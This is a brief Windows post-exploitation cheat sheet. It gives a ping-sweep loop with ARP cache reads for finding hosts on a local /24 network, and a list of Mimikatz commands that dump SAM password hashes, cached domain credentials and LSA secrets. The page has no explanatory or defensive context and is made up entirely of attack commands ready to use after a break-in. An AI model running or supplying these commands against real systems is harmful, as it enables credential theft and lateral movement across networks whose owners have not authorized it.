Post Exploitation

Windows

Discover hosts in network

arp -d
for /L %a in (1,1,254) do @start /b ping 192.168.20.%a -w 100 -n 2 >nul
arp -a

Mimikatz

privilege::debug
lsadump::sam
lsadump::cache
lsadump::secrets